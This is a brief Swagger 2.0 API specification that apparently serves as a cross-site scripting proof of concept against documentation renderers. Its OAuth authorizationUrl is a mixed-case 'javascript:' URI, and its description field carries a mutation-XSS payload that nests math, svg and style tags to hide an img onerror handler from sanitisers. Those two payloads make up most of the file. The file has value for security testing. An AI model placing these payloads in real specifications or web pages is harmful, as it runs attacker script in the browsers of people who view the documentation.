swagger: '2.0'
securityDefinitions:
  a:
    type: oauth2
    authorizationUrl: jAvascript:prompt('https://google.com')
info:
  version: "0.0.1"
  title: Example Title
  description: Please Authorize!1234 <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><style><a title="</style><img src='#' onerror='alert(1)'>">
paths:
  /:
    get:
      responses:
        200:
          description: Successful respons
